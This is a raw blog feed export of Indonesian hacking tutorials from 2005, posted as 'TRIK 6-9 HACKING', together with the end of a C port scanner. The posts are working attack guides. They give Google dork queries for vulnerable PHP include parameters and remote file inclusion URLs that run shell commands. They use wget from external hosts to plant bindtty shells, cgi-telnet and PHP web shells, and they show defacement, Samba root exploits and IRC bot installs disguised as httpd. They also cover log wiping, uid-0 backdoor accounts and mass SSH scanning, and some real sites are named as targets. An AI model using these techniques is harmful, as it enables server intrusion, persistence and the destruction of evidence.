== 1)&lt;br /&gt;fprintf(stderr, "\n[%s][%d]-&gt; connect() error\n", ip, port);&lt;br /&gt;      close(fd);&lt;br /&gt;      return (-1);&lt;br /&gt;    }&lt;br /&gt;  }&lt;br /&gt;  else&lt;br /&gt;  {&lt;br /&gt;    if(fcntl(fd, F_SETFL, flags) &lt; 0)&lt;br /&gt;    {&lt;br /&gt;      if(debug == 1)&lt;br /&gt;fprintf(stderr, "\n[%s][%d]-&gt; fcntl() error setting socket flags to original state\n", ip, port);&lt;br /&gt;      close(fd);&lt;br /&gt;      return (-1);&lt;br /&gt;    }&lt;br /&gt;    return (1);&lt;br /&gt;  }&lt;br /&gt;  select_status = select(fd + 1, &amp;connect_read, &amp;connect_write, NULL, &amp;timeout);&lt;br /&gt;  if(select_status == 0)&lt;br /&gt;  {&lt;br /&gt;    if(debug == 1)&lt;br /&gt;      fprintf(stderr, "\n[%s][%d]-&gt; connect() timed out\n", ip, port);&lt;br /&gt;    close(fd);&lt;br /&gt;    return (-2);&lt;br /&gt;  }&lt;br /&gt;  if(select_status == -1)&lt;br /&gt;  {&lt;br /&gt;    if(debug == 1)&lt;br /&gt;      fprintf(stderr, "\n[%s][%d]-&gt; select() error on connect()\n", ip, port);&lt;br /&gt;    close(fd);&lt;br /&gt;    return (-1);&lt;br /&gt;  }&lt;br /&gt;  if(FD_ISSET(fd, &amp;connect_read) || FD_ISSET(fd, &amp;connect_write))&lt;br /&gt;  {&lt;br /&gt;    if(FD_ISSET(fd, &amp;connect_read) &amp;&amp; FD_ISSET(fd, &amp;connect_write))&lt;br /&gt;    {&lt;br /&gt;      getsockopt_length = sizeof(getsockopt_error);&lt;br /&gt;      if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &amp;getsockopt_error, &amp;getsockopt_length) &lt; 0)&lt;br /&gt;      {&lt;br /&gt;errno = ETIMEDOUT;&lt;br /&gt;if(debug == 1)&lt;br /&gt;  fprintf(stderr, "\n[%s][%d]-&gt; getsockopt() timed out on connect()\n", ip, port);&lt;br /&gt;close(fd);&lt;br /&gt;return (-1);&lt;br /&gt;      }&lt;br /&gt;      if(getsockopt_error == 0)&lt;br /&gt;      {&lt;br /&gt;if(fcntl(fd, F_SETFL, flags) &lt; 0)&lt;br /&gt;{&lt;br /&gt;  if(debug == 1)&lt;br /&gt;    fprintf(stderr, "\n[%s][%d]-&gt; fcntl() error setting socket flags to original state\n", ip, port);&lt;br /&gt;  close(fd);&lt;br /&gt;  return (-1);&lt;br /&gt;}&lt;br /&gt;return (1);&lt;br /&gt;      }&lt;br /&gt;      else&lt;br /&gt;      {&lt;br /&gt;errno = getsockopt_error;&lt;br /&gt;if(debug == 1)&lt;br /&gt;  fprintf(stderr, "\n[%s][%d]-&gt; getsockopt() error on connect()\n", ip, port);&lt;br /&gt;close(fd);&lt;br /&gt;return (-1);&lt;br /&gt;      }&lt;br /&gt;    }&lt;br /&gt;  }&lt;br /&gt;  else&lt;br /&gt;  {&lt;br /&gt;    if(debug == 1)&lt;br /&gt;      fprintf(stderr, "\n[%s][%d]-&gt; socket not readable or writable\n", ip, port);&lt;br /&gt;    close(fd);&lt;br /&gt;    return (-1);&lt;br /&gt;  }&lt;br /&gt;  if(fcntl(fd, F_SETFL, flags) &lt; 0)&lt;br /&gt;  {&lt;br /&gt;    if(debug == 1)&lt;br /&gt;      fprintf(stderr, "\n[%s][%d]-&gt; fcntl() error setting socket flags to original state\n", ip, port);&lt;br /&gt;    close(fd);&lt;br /&gt;    return (-1);&lt;br /&gt;  }&lt;br /&gt;  return (1);&lt;br /&gt;}&lt;br /&gt;int usage(char *arg)&lt;br /&gt;{&lt;br /&gt;  printf("\n [0;32m******************************** [0m\n");&lt;br /&gt;  printf(" [0;32m* MIG Port Scanner v1.0 by  [0;31mno1  [0;32m* [0m\n");&lt;br /&gt;  printf(" [0;32m******************************** [0m\n");&lt;br /&gt;  printf("\n%s [[-h &lt;ip&gt;] | [-i &lt;file&gt;]] [-o &lt;file&gt;] [-p &lt;#&gt;] [-c &lt;#&gt;] [-t &lt;#&gt;] [-v] [-d]\n", arg);&lt;br /&gt;  printf("\n [-h]\tsingle ip address to scan\n");&lt;br /&gt;  printf(" [-i]\tfile with ip addresses to scan\n");&lt;br /&gt;  printf(" [-o]\tlog file (defult: stdout)\n");&lt;br /&gt;  printf(" [-p]\tports seperated by commas\n");&lt;br /&gt;  printf("\t(default: 21,22,23,25,53,80,110,111,113,119,143,515)\n");&lt;br /&gt;  printf(" [-c]\tnumber of children to spawn (default: 50)\n");&lt;br /&gt;  printf(" [-t]\tconnect timeout value (default: 3)\n");&lt;br /&gt;  printf(" [-v]\tfor verbose output (default: off)\n");&lt;br /&gt;  printf(" [-d]\tfor debuging output (default: off)\n\n");&lt;br /&gt;  return 0;&lt;br /&gt;}&lt;br /&gt;/*******************/&lt;br /&gt;// greyhats.za.net //&lt;br /&gt;/*******************/&lt;br /&gt;&lt;br /&gt;--------------mig-port-scan.c end here---------------------------&lt;br /&gt;&lt;br /&gt;iko berterimakasih kepada:&lt;br /&gt;[+] qq&lt;br /&gt;[+] tiyok&lt;br /&gt;[+] keputih group&lt;br /&gt;[+] everyone who shouting the freedom&lt;br /&gt;&lt;br /&gt;iko tidak berterimakasih kepada:&lt;br /&gt;[-] monopoli&lt;br /&gt;[-] birokrasi&lt;br /&gt;[-] para penjilat&lt;br /&gt;[-] koruptor&lt;br /&gt;[-] closed source&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933651352135206?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933651352135206/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933651352135206&amp;isPopup=true' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933651352135206'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933651352135206'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/scanner-hacking-gabungan.html' title='scanner hacking gabungan'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933639338071771</id><published>2005-02-25T19:59:00.000+07:00</published><updated>2005-02-25T19:59:53.383+07:00</updated><title type='text'>TRIK 9 HACKING</title><content type='html'>===========&lt;br /&gt;Tittle : SUPER KIDDIES HACKING: "PHP SUPER BUGS"&lt;br /&gt;Author : K-159&lt;br /&gt;Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew,&lt;br /&gt;Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel&lt;br /&gt;Email : eufrato@linuxmail.org&lt;br /&gt;Reference : security-corporations.com, security-focus.com, bugs-traq, google.com&lt;br /&gt;-------------------------------------------------------------------------------------------------------- &lt;br /&gt;Prolog : i wrote this tutorial just for my dearest brother "Lieur-Euy" thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. 'n we will rock the world again :)&lt;br /&gt;&lt;br /&gt;1. allinurl filename&lt;br /&gt;bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?filename=*".&lt;br /&gt;keyword '*.php' bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?filename=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:&lt;br /&gt;" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "&lt;br /&gt;kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. &lt;br /&gt;&lt;br /&gt;2. allinurl content&lt;br /&gt;bugs content ini targetnya dapat kita cari dengan keyword "allinurl:*.php?content=".&lt;br /&gt;keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?content=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:&lt;br /&gt;" http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts "&lt;br /&gt;kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. &lt;br /&gt;&lt;br /&gt;3. allinurl page&lt;br /&gt;bugs page ini targetnya dapat kita cari dengan keyword "allinurl:*.php?page=*".&lt;br /&gt;'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?page=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:&lt;br /&gt;http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts&lt;br /&gt;kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. &lt;br /&gt;&lt;br /&gt;4. allinurl link&lt;br /&gt;bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?link=*".&lt;br /&gt;keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?link=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:&lt;br /&gt;http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts&lt;br /&gt;kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. &lt;br /&gt;&lt;br /&gt;5.allinurl file&lt;br /&gt;bugs file ini targetnya dapat kita cari dengan keyword "allinurl:*.php?file=*".&lt;br /&gt;'*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?file=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:&lt;br /&gt;http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts&lt;br /&gt;kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. &lt;br /&gt;&lt;br /&gt;Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan :&lt;br /&gt;I. install bindtty telnet&lt;br /&gt;1.buat url seperti ini:&lt;br /&gt;" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd "&lt;br /&gt;url diatas untuk melakukan wget bindtty telnet ke server target dan hasil wget nya di taruh di folder /tmp dg nama file httpd.&lt;br /&gt;2.lalu ubah file httpd yg berada di folder /tmp tadi jadi file eksekusi:&lt;br /&gt;" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=chmod 755 /tmp/httpd "&lt;br /&gt;3.eksekusi file httpd tadi :&lt;br /&gt;" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=/tmp/httpd "&lt;br /&gt;4. buka telnet ke IP target sesuai dg port bindttynya&lt;br /&gt;&lt;br /&gt;II. install Cgi-telnet&lt;br /&gt;1.buat url seperti ini :&lt;br /&gt;" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=wget http://nofry.port5.com/pees.pl -O /var/www/cgi-bin/test.pl "&lt;br /&gt;url diatas untuk melakukan wget cgi-telnet test.pl ke server target dan hasil wget disimpan di folder /var/www/cgi-bin dg nama file test.pl. sesuaikan dengan letak folder cgi-bin didalam server tersebut untuk menyimpan hasil wget cgi-telnetnya.&lt;br /&gt;2. buat cgi-telnet test.pl jadi file eksekusi :&lt;br /&gt;" http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=chmod 755 /var/www/cgi-bin/test.pl "&lt;br /&gt;3. akses cgitelnet kita dengan membuka url :&lt;br /&gt;" http://www.target.com/cgi-bin/test.pl "&lt;br /&gt;masukkan passwordnya "n0fr13"&lt;br /&gt;&lt;br /&gt;III. install shell php&lt;br /&gt;1. buat url seperti ini :&lt;br /&gt;"http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=wget http://emilroni.port5.com/mail.php -O log.php "&lt;br /&gt;url diatas utk melakukan wget ke server target dan hasil wget berupa file log.php. bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita.&lt;br /&gt;2. akses shell php kita sesuai dengan foldernya :&lt;br /&gt;" http://www.target.com/target/log.php " &lt;br /&gt;&lt;br /&gt;IV. Deface&lt;br /&gt;http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&amp;cmd=echo "K-159 and crew was touch your system" &gt; test.html&lt;br /&gt;&lt;br /&gt;thats all my friends. just try it !!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933639338071771?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933639338071771/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933639338071771&amp;isPopup=true' title='22 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933639338071771'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933639338071771'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/trik-9-hacking.html' title='TRIK 9 HACKING'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>22</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933633211885742</id><published>2005-02-25T19:58:00.000+07:00</published><updated>2005-02-25T19:58:52.120+07:00</updated><title type='text'>TRIK 8 HACKING</title><content type='html'>=======&lt;br /&gt;VHOST&lt;br /&gt;&lt;br /&gt;= edit di httpd.conf&lt;br /&gt;= tinggal tambah no&lt;br /&gt;= kong di named.conf&lt;br /&gt;= 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz&lt;br /&gt;= 2. tar zxvf apache_1.3.27.tar.gz&lt;br /&gt;= 3. cd apache_1.3.27&lt;br /&gt;= 4. ./configure&lt;br /&gt;= 5. make&lt;br /&gt;= 6. make install&lt;br /&gt;= 7. /usr/local/apache/bin/apachectl start&lt;br /&gt;= cd /usr/local/apache/conf/httpd.conf&lt;br /&gt;= contoh&lt;br /&gt;= echo "&lt;VirtualHost 66.253.56.80&gt;" &gt; httpd.conf&lt;br /&gt;= echo "ServerName www.Cmaster4.net" &gt; httpd.conf&lt;br /&gt;= echo "DocumentRoot /home/iptek/public_html" &gt; httpd.conf&lt;br /&gt;= echo "ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin" &gt; httpd.conf&lt;br /&gt;= echo "&lt;/VirtualHost&gt;" &gt;&gt; httpd.conf&lt;br /&gt;= ------------------------------&lt;br /&gt;= ------------------------------&lt;br /&gt;= ------------------------------&lt;br /&gt;= find |grep name.conf&lt;br /&gt;= echo "zone "i-am.Cmaster4.net" IN {" &gt; named.conf&lt;br /&gt;= echo "type master; &gt; named.conf&lt;br /&gt;= echo "file "/var/named/named.local";" &gt; named.conf&lt;br /&gt;= echo "allow-update { none; };" &gt; named.conf&lt;br /&gt;= echo "};" &gt;&gt; named.conf&lt;br /&gt;= nah setelah itu kamu restart named dan httpd nya&lt;br /&gt;= /etc/init.d/named stop&lt;br /&gt;= /etc/init.d/named start&lt;br /&gt;= /etc/init.d/httpd stop&lt;br /&gt;= /etc/init.d/httpd start&lt;br /&gt;= atau&lt;br /&gt;= /etc/rc.d/init.d/named stop&lt;br /&gt;= /etc/rc.d/init.d/named start&lt;br /&gt;= /etc/rc.d/init.d/httpd stop&lt;br /&gt;= /etc/rc.d/init.d/httpd start&lt;br /&gt;= atau kalau bukan di /etc/init.d/ coba ketik find |grep named dan berikutnya find |grep httpd&lt;br /&gt;=================================================================&lt;br /&gt;wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik "/usr/sbin/httpd -DHAVE_PROXY -DHAVE" ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz&lt;br /&gt;====================&lt;br /&gt;EGGDROP&lt;br /&gt;====================&lt;br /&gt;= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..&lt;br /&gt;= ./eggdrop -mnt bot.conf&lt;br /&gt;./eggdrop -m bot.conf&lt;br /&gt;==============&lt;br /&gt;My_eGallery from K-159&lt;br /&gt;==============&lt;br /&gt;1.pasangin bindtty&lt;br /&gt;2. kalo ggk jalan bindtty nya pasangin shell.php&lt;br /&gt;3.kalo ggk jalan juga coba cgi-telnet&lt;br /&gt;contohnya&lt;br /&gt;http://livron.port5.com/mail.php &lt;---------ini source shell&lt;br /&gt;misalnya:&lt;br /&gt;http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&amp;cmd=wget%20http://livron.port5.com/mail.php&lt;br /&gt;kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget&lt;br /&gt;kalo bisa... buka:&lt;br /&gt;http://www.target.org/modules/My_eGallery/public/mail.php&lt;br /&gt;========&lt;br /&gt;pasang bindtty&lt;br /&gt;wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd&lt;br /&gt;baru bikin file exekusi &lt;br /&gt;chmod 755 /tmp/httpd&lt;br /&gt;============&lt;br /&gt;cgi-telnet&lt;br /&gt;mencari folder cgi-binnya &gt;&gt; disitulah kita Taro cgi-telnetnya&lt;br /&gt;biasanya folder cgi-bin ada di folder .../www&lt;br /&gt;tp kebanyakan webserver&lt;br /&gt;tiap user di beri folder cgi-bin masing2&lt;br /&gt;contoh:&lt;br /&gt;/home/users/russisk/html/modules/My_eGallery/public &lt;------td kan kita ada di folder ini&lt;br /&gt;http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&amp;cmd=ls%20-al%20/home/users/russisk&lt;br /&gt;kliatan cgi-bin-nya&lt;br /&gt;cd ke folder cgi-bin baru wget ke situ&lt;br /&gt;Contoh:&lt;br /&gt;wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl&lt;br /&gt;kalo bisa lanjut ke&lt;br /&gt;chmod 755 /home/users/russisk/cgi-bin/cgi.pl &lt;-------agar file cgi.pl nya jd file eksekusi&lt;br /&gt;kalo bisa tinggal buka:&lt;br /&gt;www.target.org/cgi-bin/cgi.pl port 7788&lt;br /&gt;============ end&lt;br /&gt;wget www.geocities.com/lifron/psy.tar.gz; &lt;br /&gt;tar -zvxf psy.tar.gz&lt;br /&gt;cd .psy&lt;br /&gt;./config KuNTuA 6669&lt;br /&gt;./fuck&lt;br /&gt;./run&lt;br /&gt;===========&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933633211885742?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933633211885742/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933633211885742&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933633211885742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933633211885742'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/trik-8-hacking.html' title='TRIK 8 HACKING'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933627674388410</id><published>2005-02-25T19:57:00.000+07:00</published><updated>2005-02-25T19:57:56.746+07:00</updated><title type='text'>TRIK 7 HACKING</title><content type='html'>Usage: ./sambal [-bBcCdfprsStv] [host]&lt;br /&gt;&lt;br /&gt;-b &lt;platform&gt; bruteforce (0 = Linux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)&lt;br /&gt;-B &lt;step&gt; bruteforce steps (defaulllt = 300)&lt;br /&gt;-c &lt;ip address&gt; connectback ip address&lt;br /&gt;-C &lt;max childs&gt; max childs for scan/bruttteforce mode (default = 40)&lt;br /&gt;-d &lt;delay&gt; bruteforce/scanmode delaaay in micro seconds (default = 100000)&lt;br /&gt;-f force&lt;br /&gt;-p &lt;port&gt; port to attack (default = 139)&lt;br /&gt;-r &lt;ret&gt; return address&lt;br /&gt;-s scan mode (random)&lt;br /&gt;-S &lt;network&gt; scan mode&lt;br /&gt;-t &lt;type&gt; presets (0 for a list)&lt;br /&gt;-v verbose mode&lt;br /&gt;CONTOH:&lt;br /&gt;[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0&lt;br /&gt;samba-2.2.8 &lt; remote root exploit by eSDee (www.netric.org|be)&lt;br /&gt;--------------------------------------------------------------&lt;br /&gt;+ Scan mode.&lt;br /&gt;+ [192.168.0.3] Samba&lt;br /&gt;+ [192.168.0.10] Windows&lt;br /&gt;+ [192.168.0.35] Windows&lt;br /&gt;+ [192.168.0.36] Windows&lt;br /&gt;+ [192.168.0.37] Windows&lt;br /&gt;...&lt;br /&gt;+ [192.168.0.133] Samba&lt;br /&gt;&lt;br /&gt;./sambal -b 0 -v &lt;br /&gt;&lt;br /&gt;===========&lt;br /&gt;Usage: ./mayday-linux -t [-pa]&lt;br /&gt;-t target The host to attack.&lt;br /&gt;-a password Default password is "chaaangeme".&lt;br /&gt;-p port Default port is 8001.&lt;br /&gt;================&lt;br /&gt;/usr/sbin/adduser httpd&lt;br /&gt;passwd httpd&lt;br /&gt;&lt;br /&gt;============&lt;br /&gt;PACTH SAMBA&lt;br /&gt;= root@redeye samba]# /etc/init.d/smb stop&lt;br /&gt;= Shutting down SMB services: [ OK ]&lt;br /&gt;= Shutting down NMB services: [ OK ]&lt;br /&gt;= [root@redeye root]# cd /etc/samba&lt;br /&gt;= [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz&lt;br /&gt;= [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz&lt;br /&gt;= [root@redeye samba]# patch -p1 &lt; patch-2.2.8-2.2.8a.diffs&lt;br /&gt;= [root@redeye samba]# /etc/init.d/smb start&lt;br /&gt;=======================&lt;br /&gt;=======&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933627674388410?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933627674388410/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933627674388410&amp;isPopup=true' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933627674388410'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933627674388410'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/trik-7-hacking.html' title='TRIK 7 HACKING'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933621948246153</id><published>2005-02-25T19:56:00.000+07:00</published><updated>2005-02-25T19:56:59.486+07:00</updated><title type='text'>TRIK 6 HACKING</title><content type='html'>-----------------&lt;br /&gt;Patch Your Root&lt;br /&gt;-----------------&lt;br /&gt;wget http://www.geocities.com/lifron/patch.tar.gz&lt;br /&gt;tar -zxvf patch.tar.gz&lt;br /&gt;cd patch&lt;br /&gt;./sexy&lt;br /&gt;&lt;br /&gt;BERSIH JEJAK:manual&lt;br /&gt;echo &gt;/var/spool/mail/root&lt;br /&gt;echo &gt;/var/run/utmp&lt;br /&gt;echo &gt;/var/log/wtmp&lt;br /&gt;echo &gt;/var/log/lastlog&lt;br /&gt;echo &gt;/var/log/messages&lt;br /&gt;echo &gt;/var/log/secure&lt;br /&gt;echo &gt;/var/log/maillog&lt;br /&gt;echo &gt;/var/log/xferlog&lt;br /&gt;==================================&lt;br /&gt;LOCAL ROOT&lt;br /&gt;http://www.geocities.com/lifron/local.tar.gz&lt;br /&gt;&lt;br /&gt;2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz&lt;br /&gt;cd local&lt;br /&gt;chmod 755 *&lt;br /&gt;./local.sh&lt;br /&gt;./lconfex -p&lt;br /&gt;./lconfex -f&lt;br /&gt;sh ./handy.sh 0xbffffb24 0xbffff661 &lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;Add user dlm Root:&lt;br /&gt;-------------------&lt;br /&gt;1.&lt;br /&gt;/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua&lt;br /&gt;passwd -d kuntua&lt;br /&gt;&lt;br /&gt;/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes&lt;br /&gt;passwd -d moes&lt;br /&gt;&lt;br /&gt;/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes&lt;br /&gt;passwd -d cakmoes&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;/usr/sbin/adduser jabriks -g root -d /var/jabriks&lt;br /&gt;passwd -d jabriks&lt;br /&gt;&lt;br /&gt;/usr/sbin/adduser mus -g root -d /var/mus&lt;br /&gt;passwd -d mus&lt;br /&gt;&lt;br /&gt;/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano&lt;br /&gt;passwd tondano75&lt;br /&gt;----------------------------&lt;br /&gt;**add user accses root&lt;br /&gt;----------------------------&lt;br /&gt;/usr/sbin/useradd bash -g root -u 0 -d / &lt;br /&gt;passwd -d tondano&lt;br /&gt;&lt;br /&gt;/usr/sbin/useradd jabrik -g root -u 0 -d / &lt;br /&gt;passwd -d jabrik&lt;br /&gt;&lt;br /&gt;/usr/sbin/useradd cakmoes -g root -u 0 -d / &lt;br /&gt;passwd -d cakmoes&lt;br /&gt;-----------&lt;br /&gt;Del User&lt;br /&gt;-----------&lt;br /&gt;/usr/sbin/userdel -r [namauser] &lt;br /&gt;PENTING&lt;br /&gt;kalo so dapat ROOT &lt;br /&gt;ketik id &lt;br /&gt;uname -a &lt;br /&gt;abis itu &lt;br /&gt;ketik cd /tmp &lt;br /&gt;-----------------&lt;br /&gt;--------------------------------------------&lt;br /&gt;ngeROOT ssh LINUX port 22:&lt;br /&gt;&lt;br /&gt;wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz&lt;br /&gt;tar -zxvf grabbb-0.1.0.tar.gz.tar.gz&lt;br /&gt;gcc -o grabbb grabbb.c&lt;br /&gt;cd grabbb&lt;br /&gt;./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22&lt;br /&gt;66.201.243.210&lt;br /&gt;&lt;br /&gt;--------------------------------------------&lt;br /&gt;wget www.suckmyass.org/ssh-scan8.tar.gz&lt;br /&gt;tar &lt;br /&gt;cd ssh-scan8&lt;br /&gt;./r00t 203.20 -d 4 &lt;--- scan massal SSH&lt;br /&gt;./r00t 203.20 -d 2 &lt;--- scan massal FTP&lt;br /&gt;./r00t 203.20 -d 3 &lt;--- scan massal FTP&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./r00t 134.7. -d 4&lt;br /&gt;--------------------------------------------&lt;br /&gt;ngeROOT utk OS SCO :&lt;br /&gt;wget www.renjana.com/sco&lt;br /&gt;./sco IP&lt;br /&gt;&lt;br /&gt;--------------------------------------------&lt;br /&gt;&lt;br /&gt;pasang BackDoor:&lt;br /&gt;1.&lt;br /&gt;&lt;br /&gt;id&lt;br /&gt;uname -a&lt;br /&gt;cd /tmp&lt;br /&gt;wget 